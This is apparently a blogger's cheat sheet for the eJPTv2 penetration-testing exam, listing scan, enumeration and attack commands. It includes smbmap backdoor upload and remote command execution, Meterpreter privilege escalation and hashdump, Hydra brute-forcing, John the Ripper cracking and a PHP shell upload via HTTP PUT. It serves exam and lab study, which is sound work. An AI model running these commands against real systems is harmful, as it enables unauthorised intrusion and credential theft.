4 minutes
eJPTv2 - Cheat Sheet
Disclaimer
This is merely a suggestion based on the tools I personally found useful during the test. I encourage you to take your own notes and tailor your preparation to best suit your needs for the exam
For additional details about the Exam, please refer to my exam Review post: eJPT Review
Recommended Tools
- Nmap
- Dirbuster
- nikto
- WPSCan
- CrackMapExec
- The Metasploit Framework
- SearchSploit
- Hydra
1. Assessment Methodologies
Ping Sweep
fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24
Simple Bash ping sweep:
#!/bin/bash
###ping_sweep.sh
###---------------------------------------------------------------
### Objective: Ping all hosts in the network
-----------------------------------------------------
if [ "$1" == "" ]
then
echo "PING SWEEP"
echo "Use mode : $0 REDE"
echo "Example: $0 192.168.0"
else
for host in {1..254};
do
ping -c 1 $1.$host | grep "64 bytes" | cut -d ":" -f 1 | cut -d " " -f 4;
done
fi
Nmap - Scans
nmap -sS -A 10.10.10.10
nmap -script vuln -p(open ports from the first scan)
OS Detection: nmap -Pn -O 10.10.10.10
Quick Scan: nmap -sC -sV 10.10.10.10
Full Scan: nmap -sC -sV -p- 10.10.10.10
UDP Quick Scan: nmap -sU -sV 10.10.10.10
SMB Enumeration
enum4linux
enum4linux -a <ip> # Enumerating using enum4linux tool
smbclient
smbclient -L //IP -N # Checking for available shares
smbclient //<target IP>/IPC$ -N # Connecting to a share
smbmap
smbmap -u guest -p "" -d . -H <TARGET_IP>
smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP>
## Run a command
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'
Metasploit
# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor
2. Host & Network Auditing
Checking Routes
ip route # Checking defined routes in linux
route # Checking defined routes in linux
route print # Checking defined routes in windows
Adding Manual Routes
ip route add <subnet> via <gateway or router address>
Finding Mac Addresses
ipconfig /all # windows
ifconfig # *nix OSs
ip addr # linux
Checking ARP Cache
arp -a # Windows
arp # *nix OSs
ip neighbour # Linux
Checking for Listening Ports On a Host
#Windows
netstat -ano
Get-NetTCPConnection | where {$_.State -eq 'Listen'}
#Linux
netstat -tunp
lsof -i -P -n | grep LISTEN
ss -tuln
3. Host & Network Penetration Testing
Use the information from the 1 and 2 phases to find a vulnerable threat vector.
Below are some helpful Vulnerability assessment resources:
- Searchsploit
- ExploitDB
- Msfconsole search command
- Nessus
Reverse Shell
Excelente online Reverse Shell Generator
Online - Reverse Shell Generator
Enconde-Decode
Metasploit Basic Commands
search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)
Meterpreter
#Autoroute
meterpreter> run autoroute -s <subnet>
meterpreter > run autoroute -p # show active route table
#Basic Commands
background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump
Hydra
hydra -U ftp # hydra uses module for each service to attack. To get information about a module this command can be used
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -l admin -P pass.txt -f ftp://10.10.10.10 # Stop attacking on finding first successful hit for user admin
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V # Attacking http post form
John-The-Ripper
john --list=formats
john -incremental -users:<users list> <file to crack> # if you want to crack only certain users from the password database such as /etc/shadow file
john --show crackme # Check cracked password after completion of cracking session, where crackme is the password database file
john -wordlist=<wordlist> <file to crack>
john -wordlist=<wordlist> -rules <file to crack> # rules are used for cracking mangling words such as for cat mangling words could be c@t,caT,CAT,CaT
4. Web Application Penetration Testing
Information Gathering
wappanalyzer
whatweb
nikto -h
whatweb <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
Banner Grabbing
**nc -v 10.10.10.10 port**
**HEAD / HTTP/1.0**
OpenSSL for HTTPS services
**openssl s_client -connect 10.10.10.10:443**, **HEAD / HTTP/1.0**
Httprint
**httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt**
HTTP Verbs
GET, POST, HEAD, PUT, DELETE, OPTIONS
Use the OPTIONS to check if other verbs are available:
nc 10.10.10.10 80
OPTIONS / HTPP/1.0
To upload a PHP shell, HTTP verbs can be utilized. First, determine the content length, then employ the PUT method for uploading the shell. It’s essential to include the payload size in the PUT command.
wc -m shell.php
x shell.php
PUT /shell.php
Content-type: text/html
Content-length: y
Directory and File Scanning
**dirsearch.py -u http://10.10.10.10 -e ***
**gobuster -u 10.10.10.10 -w /path/to/wordlist.txt
ffuf** -w **/path/to/wordlist.txt**:FUZZ -u http://www.evil.com/FUZZ
dirb http://<IP>/
**dirbyster&**